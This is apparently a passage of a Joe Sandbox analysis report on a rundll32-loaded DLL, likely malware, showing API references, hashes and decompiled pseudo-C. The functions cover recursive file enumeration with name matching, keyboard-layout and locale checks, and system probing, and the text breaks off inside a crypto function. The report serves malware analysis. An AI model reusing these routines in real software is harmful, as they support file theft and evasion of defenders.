0x1000d9cf
0x1000d9d4
0x00000000
0x1000d9d6
0x1000d9e3
0x1000d9eb
0x00000000
0x1000d9ed
0x1000d9ef
0x1000d9f7
0x00000000
0x1000d9f9
0x1000d9fc
0x1000da02
0x1000da02
0x1000d9f7
0x1000d9eb
0x1000d9d4
0x1000da25

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3

Part of subcall function 10009525: RtlAllocateHeap.E77242D6(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
Instruction ID: d4f531dc68e55bc41b3b40657ad9fbb231386c8691297bdc3f0db5db7518656b
Opcode Fuzzy Hash: 3b6d31de2b3605a8e01a70cf34acd78c63f4aacfa909cfe4443a4393862ed2a2
Instruction Fuzzy Hash: C5212530604255BBEB249B66CC48E6FBFBCEFC7B95F00415EB501AA2A0D671DA40CA31

Uniqueness

Uniqueness Score: -1.00%

Function 69372030 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 69372069
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 6937207A
GetCurrentThreadId.KERNEL32 ref: 69372082
GetTickCount.KERNEL32 ref: 6937208A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,693413B9), ref: 69372099

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
Instruction ID: 8b3cb01ddfc5a9076dee4c8247cd5aedbcba059eea28e38c671a831fda68af8c
Opcode Fuzzy Hash: 65dc85ff24c29831b7545104835764622879de7d03e6565988e2b04e2d8a0f63
Instruction Fuzzy Hash: 7F1173B55053418FCB10EF79EA8955BBBE8FB89364F010839E865CB300EA35D449CB92

Uniqueness

Uniqueness Score: -1.00%

Function 693720E0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
UnhandledExceptionFilter.KERNEL32 ref: 6937213F
GetCurrentProcess.KERNEL32 ref: 69372148
TerminateProcess.KERNEL32 ref: 69372159
abort.MSVCRT ref: 69372162

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
Instruction ID: 0a5301f01946ca17772e9514783ebaa5283c7045d7d6f0960cb8cc4bc0236249
Opcode Fuzzy Hash: 7a4934d67a6d75af45ca9970d86da4f5df354308f23148e89ccb0b4e5d377342
Instruction Fuzzy Hash: D91113B5804381CFDB00EF69C64561ABBF4FB4A304F008A29E9A89B300E77899458F52

Uniqueness

Uniqueness Score: -1.00%

Function 693720DC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6937212F
UnhandledExceptionFilter.KERNEL32 ref: 6937213F
GetCurrentProcess.KERNEL32 ref: 69372148
TerminateProcess.KERNEL32 ref: 69372159
abort.MSVCRT ref: 69372162

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
Instruction ID: d718274709b9049c1d57c63cc6beaa3bc162dd1cc57d898e45b9b0af26a2eaad
Opcode Fuzzy Hash: 8d24d0fce71a20ab2fd4d1a0415f9396b5f982dc0ada785d4f02f9b9fc2236b5
Instruction Fuzzy Hash: F411D7B6800385CFDF00EFA9D7496597BF8FB07304F008629E9A59B301E77899458F56

Uniqueness

Uniqueness Score: -1.00%

Function 1000C547 Relevance: 3.1, APIs: 2, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E1000C547(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E10009DC8(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E1000953B( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E1000C51F( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push("\\");
						_t60 = E10009DC8(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x10020d58; // 0x4a5f900
							 *((intOrPtr*)(_t54 + 0xc4))(1);
							_push(1);
							_push(1);
							_push(0);
							E1000C547(_t60, _t75, 1, 5, E10011316, _a16);
							_t63 = _t63 + 0x1c;
							E1000953B( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x10020e8c; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x10020d90; // 0x4a5fc28
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E10011316(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x10020d58; // 0x4a5f900
						 *((intOrPtr*)(_t46 + 0xc4))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x10020d58; // 0x4a5f900
				 *((intOrPtr*)(_t31 + 0x84))(_t59);
				goto L14;
			}

0x1000c547
0x1000c553
0x1000c555
0x1000c557
0x1000c55d
0x1000c562
0x1000c565
0x1000c56a
0x1000c686
0x1000c686
0x1000c57e
0x1000c583
0x1000c675
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c589
0x1000c589
0x1000c596
0x00000000
0x00000000
0x1000c5a4
0x1000c5f7
0x1000c5f7
0x1000c5ff
0x1000c600
0x1000c60b
0x1000c60d
0x1000c610
0x1000c615
0x1000c617
0x1000c61f
0x1000c625
0x1000c627
0x1000c629
0x1000c63e
0x1000c643
0x1000c64c
0x1000c652
0x00000000
0x1000c615
0x1000c5a6
0x1000c5a8
0x1000c5a8
0x1000c5a8
0x1000c5b4
0x1000c5b5
0x1000c5bf
0x00000000
0x00000000
0x1000c5cc
0x1000c5d1
0x1000c5d6
0x00000000
0x00000000
0x1000c5d8
0x1000c5df
0x1000c5e5
0x1000c5e5
0x1000c5e8
0x1000c5f5
0x00000000
0x00000000
0x00000000
0x1000c653
0x1000c661
0x1000c669
0x1000c66f
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 1000C578
FindNextFileW.KERNEL32(00000000,?), ref: 1000C65B

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
Instruction ID: 7b2f7127e2c913cda9fb88d985b2f6b10647df60f7fc8f8a01ff42f64e48081d
Opcode Fuzzy Hash: bc104e7280cc2e0da98bdee975f8fa39e31bae445942418d196ed17285db0488
Instruction Fuzzy Hash: FA31C371A013196FFB10DBA4DC89FDA37A8EB406D1F1001A5F905A61D5EB71EA818B90

Uniqueness

Uniqueness Score: -1.00%

Function 1000338F Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000338F() {
				signed int _v8;
				intOrPtr _v12;
				char _v24;
				signed int _t31;
				intOrPtr _t32;
				signed int _t33;
				void* _t35;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t45;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t51;
				intOrPtr _t52;
				int _t55;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;
				void* _t70;
				void* _t73;

				_v8 = _v8 & 0x00000000;
				_t45 =  *0x10020e00; // 0x0
				_t31 =  *0x10020e04; // 0x0
				_t46 = _t45 + 0x3c;
				_t51 =  *0x10020dec; // 0x0
				_t44 =  *0x10020de8; // 0x0
				asm("adc eax, 0x0");
				_v12 = _t51;
				_t60 = _t51 - _t31;
				if(_t60 < 0 || _t60 <= 0 && _t44 <= _t46) {
					L22:
					return _t31;
				} else {
					_t55 = 0;
					 *0x10020e00 = _t44;
					 *0x10020e04 = _t51;
					_t62 =  *0x10020dfc - _t55; // 0x0
					if(_t62 <= 0) {
						goto L22;
					}
					_t58 = 0;
					do {
						_t32 =  *0x10020e08; // 0x0
						if( *((intOrPtr*)(_t58 + _t32)) == 0) {
							L18:
							_t31 = _v8;
							goto L19;
						}
						_t52 =  *((intOrPtr*)(_t58 + _t32 + 0x18));
						if(_t52 == 0 || E1000C2CB(_t52) == 0) {
							_t47 =  *0x10020e08; // 0x0
							if( *((intOrPtr*)(_t58 + _t47 + 4)) == 0 ||  *((intOrPtr*)(_t58 + _t47 + 0x1c)) != 0) {
								_t33 =  *(_t58 + _t47);
								if(_t33 <= 0) {
									goto L18;
								}
								asm("cdq");
								_t35 = _t33 * 0x3c +  *((intOrPtr*)(_t58 + _t47 + 0x10));
								asm("adc edx, [esi+ecx+0x14]");
								_t70 = _t52 - _v12;
								if(_t70 > 0 || _t70 >= 0 && _t35 > _t44) {
									goto L18;
								} else {
									goto L14;
								}
							} else {
								L14:
								if( *((intOrPtr*)(_t58 + _t47 + 0xc)) == 0) {
									E100060E9( *((intOrPtr*)(_t58 + _t47 + 8)), 0, 0, 0);
									_t59 = _t59 + 0x10;
								} else {
									GetLocaleInfoA(_t55, 0x5a,  &_v24, 4);
									_t41 =  *0x10020e08; // 0x0
									 *((intOrPtr*)(_t58 + _t41 + 0xc))();
								}
								_t37 =  *0x10020e08; // 0x0
								 *((intOrPtr*)(_t58 + _t37 + 0x10)) = _t44;
								 *((intOrPtr*)(_t58 + _t37 + 0x14)) = _v12;
								_t38 =  *0x10020e08; // 0x0
								 *((intOrPtr*)(_t58 + _t38 + 0x1c)) = 1;
								_t31 = 1;
								_v8 = 1;
								goto L19;
							}
						} else {
							goto L18;
						}
						L19:
						_t55 = _t55 + 1;
						_t58 = _t58 + 0x20;
						_t73 = _t55 -  *0x10020dfc; // 0x0
					} while (_t73 < 0);
					if(_t31 != 0) {
						_t31 = E100036A4();
					}
					goto L22;
				}
			}

0x10003395
0x10003399
0x1000339f
0x100033a4
0x100033a7
0x100033ae
0x100033b4
0x100033b7
0x100033bc
0x100033be
0x100034b2
0x100034b6
0x100033ce
0x100033ce
0x100033d0
0x100033d6
0x100033dc
0x100033e2
0x00000000
0x00000000
0x100033e8
0x100033ea
0x100033ea
0x100033f3
0x10003496
0x10003496
0x00000000
0x10003496
0x100033f9
0x100033ff
0x1000340e
0x10003419
0x10003422
0x10003427
0x00000000
0x00000000
0x1000342c
0x1000342d
0x10003431
0x10003435
0x10003438
0x00000000
0x00000000
0x00000000
0x00000000
0x10003440
0x10003440
0x10003445
0x1000346b
0x10003470
0x10003447
0x10003450
0x10003456
0x1000345b
0x1000345b
0x10003473
0x1000347b
0x1000347f
0x10003485
0x1000348b
0x1000348f
0x10003491
0x00000000
0x10003491
0x00000000
0x00000000
0x00000000
0x10003499
0x10003499
0x1000349a
0x1000349d
0x1000349d
0x100034ab
0x100034ad
0x100034ad
0x00000000
0x100034ab

APIs

GetLocaleInfoA.KERNEL32(00000000,0000005A,?,00000004,?,00000000,00000001,?,?,10002821), ref: 10003450

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
Instruction ID: e917d9a377e98bf3d5a9616198259dbf32bf4c4c92623d05dc2f8582aaf3a776
Opcode Fuzzy Hash: 12f8d613c77fa2b6b561c5fc77a78a839f321e9505c0cf5ae6a38080ea26a529
Instruction Fuzzy Hash: 6A315E716007109BF757CF55CD85B2BB7EAEB40384F65C82EE5429A25AC3B0F982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10002C5E Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002C5E() {
				signed int _v8;
				signed int _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				signed int _v40;
				intOrPtr _v44;
				char _v56;
				char _v312;
				short _t31;
				short _t32;
				short _t33;
				short _t34;
				short _t35;
				short _t36;
				short _t37;
				short _t38;
				short _t39;
				short _t40;
				short _t41;
				intOrPtr _t43;
				intOrPtr _t44;
				signed int _t48;
				signed int _t51;
				signed int _t52;
				short _t54;
				signed int _t57;
				signed int _t59;
				int _t60;
				void* _t62;

				_t31 = 0x19;
				_v36 = _t31;
				_t59 = 0;
				_t32 = 0x23;
				_v34 = _t32;
				_t33 = 0x3f;
				_v32 = _t33;
				_t34 = 0x2c;
				_v30 = _t34;
				_t35 = 0x2b;
				_v28 = _t35;
				_t36 = 0x37;
				_t54 = 0x40;
				_v26 = _t36;
				_t37 = 0x43;
				_v22 = _t37;
				_t38 = 0x28;
				_v20 = _t38;
				_t39 = 0x42;
				_v18 = _t39;
				_t40 = 0x22;
				_v16 = _t40;
				_t41 = 0x1a;
				_v14 = _t41;
				_t43 =  *0x10020d50; // 0x4a5fa80
				_v8 = 0;
				_v24 = _t54;
				_t44 =  *((intOrPtr*)(_t43 + 0x38))(_t54,  &_v312);
				_t51 = 0;
				_v44 = _t44;
				_v12 = 0;
				if(_t44 != 0) {
					do {
						_t57 = 0;
						_t48 =  *(_t62 + _t51 * 4 - 0x134) & 0x3ff;
						_v40 = _t48;
						_t52 = _t48;
						do {
							_t60 =  *(_t62 + _t57 * 2 - 0x20) & 0x0000ffff;
							GetLocaleInfoA(3, _t60,  &_v56, 4);
							if(_t52 != _t60) {
								_t59 = _v8;
							} else {
								_t59 = 1;
								_v8 = 1;
							}
							_t57 = _t57 + 1;
						} while (_t57 < 0xc);
						_t51 = _v12 + 1;
						_v12 = _t51;
					} while (_t51 < _v44);
				}
				return _t59;
			}

0x10002c6b
0x10002c6e
0x10002c72
0x10002c74
0x10002c77
0x10002c7b
0x10002c7e
0x10002c82
0x10002c85
0x10002c89
0x10002c8c
0x10002c90
0x10002c93
0x10002c96
0x10002c9a
0x10002c9d
0x10002ca1
0x10002ca4
0x10002ca8
0x10002cab
0x10002caf
0x10002cb2
0x10002cb6
0x10002cb7
0x10002cc2
0x10002cc8
0x10002ccb
0x10002ccf
0x10002cd2
0x10002cd4
0x10002cd7
0x10002cdc
0x10002cdf
0x10002cef
0x10002cf1
0x10002cf4
0x10002cf7
0x10002cf9
0x10002cf9
0x10002d07
0x10002d10
0x10002d1a
0x10002d12
0x10002d14
0x10002d15
0x10002d15
0x10002d1d
0x10002d1e
0x10002d26
0x10002d27
0x10002d2a
0x10002d2f
0x10002d35

APIs

GetLocaleInfoA.KERNEL32(00000003,?,?,00000004,00000000), ref: 10002D07

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
Instruction ID: 918cc5d447bd8afb92986e08f6f4ef1d20a23fc78e2c3519b4597a407533d554
Opcode Fuzzy Hash: a1b938862a9920fdab6539c62caee96879eb47422c256fb5aa8c4470ff4a9cdd
Instruction Fuzzy Hash: CB218276E54319AAFB00DFD5A891BFEB7B4EF48750F20141BEA04EB190D2B10E41C795

Uniqueness

Uniqueness Score: -1.00%

Function 10012137 Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10012137(void* __eflags) {
				char _v16;
				intOrPtr _t10;
				intOrPtr* _t19;

				_t19 = E10013A5B(0x14);
				if(_t19 != 0) {
					 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
					 *((intOrPtr*)(_t19 + 8)) = 8;
					 *_t19 = 1;
					 *((intOrPtr*)(_t19 + 4)) = 1;
					_t10 = E10013A5B(0x20);
					 *((intOrPtr*)(_t19 + 0x10)) = _t10;
					if(_t10 != 0) {
						return _t19;
					}
					E10013A49(_t10, _t19);
					L2:
					return 0;
				}
				GetLocaleInfoA(0x100, 0x200,  &_v16, 4);
				goto L2;
			}

0x10012145
0x1001214a
0x10012166
0x1001216d
0x10012174
0x10012178
0x1001217b
0x10012180
0x10012186
0x00000000
0x10012191
0x10012189
0x10012162
0x00000000
0x10012162
0x1001215c
0x00000000

APIs

GetLocaleInfoA.KERNEL32(00000100,00000200,00000004,00000004,00000000), ref: 1001215C

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
Instruction ID: 99f10fc073ecf109e24ac13ca0acd49dcb2bbe1fdf15cb55e50fbcb3f53cae0e
Opcode Fuzzy Hash: 7b1663db65b7fe56265af7ae9b1752d128a7e18b015dc0efa9ad134005c2b56c
Instruction Fuzzy Hash: 54F0B4B1A40712AEE720DB709C06B4B77D4DF10B55F10C429EAD5DE1C1E7B0D4844791

Uniqueness

Uniqueness Score: -1.00%

Function 1000FFF2 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FFF2(void* __ecx, void* __edx) {
				char _v16;
				void* _t4;
				short _t8;
				void* _t9;
				void* _t17;
				void* _t19;

				_t17 = __edx;
				_t9 = __ecx;
				_t4 = E1000D389(__edx);
				GetLocaleInfoA(0x32, 9,  &_v16, 4);
				_t2 = _t9 + 0x400; // 0x400
				E100119CD(_t17, _t4, _t19, _t2);
				_t8 = 0x14;
				 *((short*)(_t9 + 0x420)) = _t8;
				return _t8;
			}

0x1000fffb
0x1000fffd
0x10010000
0x10010012
0x10010018
0x10010023
0x1001002b
0x1001002e
0x10010037

APIs

GetLocaleInfoA.KERNEL32(00000032,00000009,10002D8F,00000004,00000000,00000000,00000424,10002D8F,00000000), ref: 10010012

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
Instruction ID: 1892679a08907ef3746c90150a7bae5dd7f49ea90dce8a51ef2b7239b0e12dfa
Opcode Fuzzy Hash: 3b7f269050b1f35a73f0b8165a53a42d9c1832364f09677761d1ca134793b5f9
Instruction Fuzzy Hash: BCE092763402043AE704A699A886FBB379CDB84664F14012AFB09DF1C2E9F06C4182B5

Uniqueness

Uniqueness Score: -1.00%

Function 1000AFB9 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AFB9(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x1000afc1
0x1000afcc
0x1000afd7
0x1000afc3
0x1000afc5
0x1000afc7
0x1000afc7

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,1000B44C,?,?,00000001), ref: 1000AFCC

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
Instruction ID: 22c7fc0e0940038590920ac71496bdb1d1527b7a0f48138a502887aeb48b8403
Opcode Fuzzy Hash: e98dc7e497c2cb20d98128c2fd06c0b19b016171e807c51aea00fd95ed56fdf7
Instruction Fuzzy Hash: 2EC0226160020E46DF0097A266066BA72EC4B08289F100062EC03F00C0E560DC8042A0

Uniqueness

Uniqueness Score: -1.00%

Function 100194D0 Relevance: .4, Instructions: 359
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E100194D0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
